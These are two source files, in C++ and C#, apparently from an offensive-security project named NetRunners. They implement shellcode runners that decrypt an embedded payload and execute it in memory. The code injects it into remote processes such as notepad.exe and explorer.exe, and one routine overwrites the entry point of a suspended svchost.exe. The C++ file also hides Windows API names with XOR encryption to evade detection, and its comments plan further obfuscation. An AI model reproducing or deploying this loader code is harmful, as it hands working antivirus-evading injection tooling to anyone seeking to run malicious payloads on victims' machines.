File: NetRunnersCpp/NetRunners/Runners.cpp
#include "pch.h"
#include <Windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#pragma comment(lib, "ntdll")
#include "Runners.h"
#include "Globals.h"
#include "Decryptors.h"

// size of buf
unsigned int sBuf = sizeof(buf);

//APIs
//// VirtualProtect
BOOL(WINAPI* pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
//// VirtualAlloc
LPVOID(WINAPI* pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
//// CreateThread
HANDLE(WINAPI* pCreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
//// WaitForSingleObject
DWORD(WINAPI* pWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
//// OpenProcess
HANDLE(WINAPI* pOpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
//// VirtualAllocEx
LPVOID(WINAPI* pVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
//// WriteProcessMemory
BOOL(WINAPI* pWriteProcessMemory)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten);
//// CreateRemoteThread
HANDLE(WINAPI* pCreateRemoteThread)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

// Simple Shellcode Runner (virtualalloc + rtlmovememory + virtualprotect + createthread + waitforsingleobject)
int runner::Runner::Run(void) 
{
	// Allocate buffer for payload
	decryptor::Decryptor::XORDecrypt((char*)VA, sizeof(VA), XORKey, sizeof(XORKey));
	pVirtualAlloc = (LPVOID(WINAPI*)(LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), VA); // dynamic resolve
	LPVOID pMemory = pVirtualAlloc(0, sBuf, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Decrypt buf
	decryptor::Decryptor::XORDecrypt((char*)buf, sizeof(buf), XORKey, sizeof(XORKey));

	// Copy payload to the buffer
	RtlMoveMemory(pMemory, buf, sBuf);

	// Change protection
	DWORD oldProtect = 0;
	decryptor::Decryptor::XORDecrypt((char*)VP, sizeof(VP), XORKey, sizeof(XORKey));
	pVirtualProtect = (BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), VP);
	BOOL bVP = pVirtualProtect(pMemory, sBuf, PAGE_EXECUTE_READ, &oldProtect);

	if (bVP != 0)
	{
		// execute thread
		decryptor::Decryptor::XORDecrypt((char*)CT, sizeof(CT), XORKey, sizeof(XORKey));
		pCreateThread = (HANDLE(WINAPI*)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), CT);
		HANDLE hThread = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)pMemory, 0, 0, 0);

		// dont close
		decryptor::Decryptor::XORDecrypt((char*)WFSO, sizeof(WFSO), XORKey, sizeof(XORKey));
		pWaitForSingleObject = (DWORD(WINAPI*)(HANDLE, DWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), WFSO);
		pWaitForSingleObject(hThread, INFINITE);
	}
	return 0;
}
// Process Injection Shellcode Runner (OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread + Waitforsingleobject)
int runner::Runner::piRun(void)
{
	// retrieve pid
	int pid = runner::Helper::getPID(L"notepad.exe");

	if (pid)
	{
		// open handle to target proccess
		decryptor::Decryptor::XORDecrypt((char*)OP, sizeof(OP), XORKey, sizeof(XORKey));
		pOpenProcess = (HANDLE(WINAPI*)(DWORD, BOOL, DWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), OP);
		HANDLE hProc = pOpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
		
		// alloc memory buffer on remote process
		decryptor::Decryptor::XORDecrypt((char*)VAE, sizeof(VAE), XORKey, sizeof(XORKey));
		pVirtualAllocEx = (LPVOID(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), VAE);
		LPVOID pRMemory = pVirtualAllocEx(hProc, NULL, sBuf, MEM_COMMIT, PAGE_EXECUTE_READ);

		// Decrypt buf
		decryptor::Decryptor::XORDecrypt((char*)buf, sizeof(buf), XORKey, sizeof(XORKey));

		// write payload to buffer
		decryptor::Decryptor::XORDecrypt((char*)WPM, sizeof(WPM), XORKey, sizeof(XORKey));
		pWriteProcessMemory = (BOOL(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*))GetProcAddress(GetModuleHandle(L"kernel32.dll"), WPM);
		pWriteProcessMemory(hProc, pRMemory, (PVOID)buf, (SIZE_T)sBuf, (SIZE_T *)NULL);

		// create new thread on remote process
		decryptor::Decryptor::XORDecrypt((char*)CRT, sizeof(CRT), XORKey, sizeof(XORKey));
		pCreateRemoteThread = (HANDLE(WINAPI*)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), CRT);
		HANDLE hThread = pCreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRMemory, NULL, 0, NULL);
		
		if (hThread != NULL)
		{
			// wait for thread
			decryptor::Decryptor::XORDecrypt((char*)WFSO, sizeof(WFSO), XORKey, sizeof(XORKey));
			pWaitForSingleObject = (DWORD(WINAPI*)(HANDLE, DWORD))GetProcAddress(GetModuleHandle(L"kernel32.dll"), WFSO);
			pWaitForSingleObject(hThread, INFINITE);
			return 0;
		}
	}
	return -1;
}

int runner::Runner::epsRun(void) // credits: https://bohops.com/2023/06/09/no-alloc-no-problem-leveraging-program-entry-points-for-process-injection/
{
	// start process 
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	CreateProcessA(0, (LPSTR)"C:\\Windows\\System32\\svchost.exe", NULL, NULL, false, 0x4, NULL, 0, &si, &pi);		// TO-DO obfuscate win32 api call

	// Get memory address of primary thread
	ULONG64 threadAddr = 0;
	ULONG retlen = 0;
	NtQueryInformationThread(pi.hThread, (THREADINFOCLASS)9, &threadAddr, sizeof(PVOID), &retlen);
	//printf("Found primary thread start address: %I64x\n", threadAddr);

	// Decrypt buf
	decryptor::Decryptor::XORDecrypt((char*)buf, sizeof(buf), XORKey, sizeof(XORKey));

	// Overwrite memory address of thread with our shellcode
	WriteProcessMemory(pi.hProcess, (LPVOID)threadAddr, buf, sBuf, NULL);

	// resume thread
	ResumeThread(pi.hThread);

	return 0;
}

// Get PID for process injection
int runner::Helper::getPID(const wchar_t* procname)                                                                // TO-DO Obfuscate apis: CreateToolhelp32Snapshot, CloseHandle, lstrcmpiW
{
	int pid = 0;
	HANDLE hProcSnap;
	PROCESSENTRY32 pe32;

	// take snapshot of all processes
	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProcSnap == INVALID_HANDLE_VALUE)
	{
		//std::cout << "CreateToolhelp32Snapshot (of processes) failed with error " << GetLastError() << std::endl;
		return 0;
	}
	// define size
	pe32.dwSize = sizeof(PROCESSENTRY32);
	if (!Process32First(hProcSnap, &pe32))
	{
		//std::cout << "Failed getting first process" << std::endl;
		CloseHandle(hProcSnap);
		return 0;
	}
	// std::cout << "Process: " << pe32.szExeFile << std::endl;
	while (Process32Next(hProcSnap, &pe32))
	{
		if (lstrcmpiW(procname, pe32.szExeFile) == 0)
		{
			pid = pe32.th32ProcessID;
			break;
		}
	}
	CloseHandle(hProcSnap);
	return pid;
}

File: NetRunners/NetRunners/Runners/Runners.cs
using System;
using System.Text;
using System.Runtime.InteropServices;
using System.Diagnostics;
using static NetRunners.Decryptors.Decryptors;
using static NetRunners.Data.Delegates;
using static NetRunners.Data.Structures;
using static NetRunners.Data.Encrypted;

namespace NetRunners.Runners
{
    /// <summary>
    /// This class contains various shellcode runners.
    /// Retrieves encrypted payload from Shellcode class.
    /// Retrieves win32 apis from Win32APIs class, retrieves needed structures from Structures class.
    /// </summary>
    class Runners
    {
        static byte[] buf = NetRunners.Data.Encrypted.buf;

        // Basic Reflective Runner
        public static void Run()
        {
            try
            {
                // try to decrypt buf
                try
                {
                    buf = DecryptBytesToBytes_Aes(buf, AesKey, AesIV);
                }
                catch (Exception e)
                {
                    throw new InvalidOperationException("Decryption of buffer failed.", e);
                }
                int sBuf = buf.Length;

                // call virtual alloc to allocate memory space here
                IntPtr pMemory = VirtualAlloc(IntPtr.Zero, (UIntPtr)sBuf, 0x3000, PAGE_READWRITE);
                if (pMemory == IntPtr.Zero)
                    throw new InvalidOperationException($"VirtualAlloc failed with error code: {Marshal.GetLastWin32Error()} ");

                // copy shellcode to allocated memory
                Marshal.Copy(buf, 0, pMemory, sBuf);

                // change memory protection
                uint oldProtect;

                bool bVP = VirtualProtect(pMemory, (UIntPtr)sBuf, PAGE_READWRITE, out oldProtect);
                if (!bVP)
                {
                    throw new InvalidOperationException($"VirtualProtect failed with error code: {Marshal.GetLastWin32Error()}");
                }

                // execute shellcode
                IntPtr hThread = CreateThread(IntPtr.Zero, 0, pMemory, IntPtr.Zero, 0, IntPtr.Zero);
                if (hThread == IntPtr.Zero)
                    throw new InvalidOperationException($"CreateThread failed with error code: {Marshal.GetLastWin32Error()} ");

                // call wait function
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
            catch (Exception e)
            {
                // handle error
                Console.WriteLine($"An error occurred: {e.Message}");
                throw;
            }
        }

        // Process Injection Runner
        public static void piRun()
        {
            try
            {
                // get explorer pid
                Process[] explorerProcesses = Process.GetProcessesByName("explorer");
                int explorerPID = explorerProcesses[0].Id;
                if (explorerPID == 0)
                    throw new Exception($"Failed retrieving explorer's PID");


                // open handle to target process 
                IntPtr hProcess = OpenProcess(0x001F0FFF, false, explorerPID);
                if (hProcess == IntPtr.Zero)
                    throw new InvalidOperationException($"OpenProcess failed with error code: {Marshal.GetLastWin32Error()}");

                //decrypt buf
                try
                {
                    buf = DecryptBytesToBytes_Aes(buf, AesKey, AesIV);
                }
                catch (Exception e)
                {
                    throw new InvalidOperationException("Decryption of buffer failed.", e);
                }
                int sBuf = buf.Length;

                // allocate memory on remote process
                IntPtr pRMemory = VirtualAllocEx(hProcess, IntPtr.Zero, (UIntPtr)sBuf, 0x3000, PAGE_EXECUTE_READ);
                if (pRMemory == IntPtr.Zero)
                    throw new InvalidOperationException($"VirtualAlloc failed with error code: {Marshal.GetLastWin32Error()}");

                // write to remote process memory
                IntPtr outSize;
                WriteProcessMemory(hProcess, pRMemory, buf, buf.Length, out outSize);
                if (outSize == IntPtr.Zero)
                    throw new InvalidOperationException($"WriteProcessMemory failed with error code: {Marshal.GetLastWin32Error()}");

                // create remote thread to execute shellcode
                IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, pRMemory, IntPtr.Zero, 0, IntPtr.Zero);
                if (hThread == IntPtr.Zero)
                    throw new InvalidOperationException($"WriteProcessMemory failed with error code: {Marshal.GetLastWin32Error()}");
            }
            catch (Exception e)
            {
                // handle error
                Console.WriteLine($"An error occurred: {e.Message}");
                throw;
            }
        }

        // EntryPoint Stomping Runner (Special Thanks 2 cpu0x00!)
        public static void epsRun()
        {
            try
            {
                // instantiate structs
                STARTUPINFO si = new STARTUPINFO();
                PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
                PROCESS_BASIC_INFORMATION bi = new PROCESS_BASIC_INFORMATION();

                // create suspended svchost process
                bool res = CreateProcessA(null, "C:\\Windows\\System32\\svchost.exe", IntPtr.Zero, IntPtr.Zero, false, 0x4, IntPtr.Zero, null, ref si, out pi);
                if (res == false)
                    throw new InvalidOperationException($"CreateProcessA failed with error code: {Marshal.GetLastWin32Error()}");

                // fetch PEB address using zwqueryinfo
                uint tmp = 0;
                IntPtr hProcess = pi.hProcess;
                ZwQueryInformationProcess(hProcess, 0, ref bi, (uint)(IntPtr.Size * 6), ref tmp);

                IntPtr ptrToImageBase = (IntPtr)((Int64)bi.PebAddress + 0x10);

                // fetch address of the code base
                byte[] addrBuf = new byte[IntPtr.Size];
                IntPtr nRead = IntPtr.Zero;
                ReadProcessMemory(hProcess, ptrToImageBase, addrBuf, addrBuf.Length, out nRead);

                IntPtr svchostBase = (IntPtr)(BitConverter.ToInt64(addrBuf, 0));

                // parse PE header to locate entrypoint
                byte[] data = new byte[0x200];
                ReadProcessMemory(hProcess, svchostBase, data, data.Length, out nRead);

                uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3C);
                uint opthdr = e_lfanew_offset + 0x28;
                uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr);
                IntPtr addressOfEntryPoint = (IntPtr)(entrypoint_rva + (UInt64)svchostBase);

                //decrypt buf
                try
                {
                    buf = DecryptBytesToBytes_Aes(buf, AesKey, AesIV);
                }
                catch (Exception e)
                {
                    throw new InvalidOperationException("Decryption of buffer failed.", e);
                }
                int sBuf = buf.Length;

                // write shellcode to memory
                WriteProcessMemory(hProcess, addressOfEntryPoint, buf, sBuf, out nRead);

                // resume thread
                ResumeThread(pi.hThread);
            }
            catch (Exception e)
            {
                Console.WriteLine($"An error ocurred: {e.Message}");
                throw;
            }
        }
    }
}
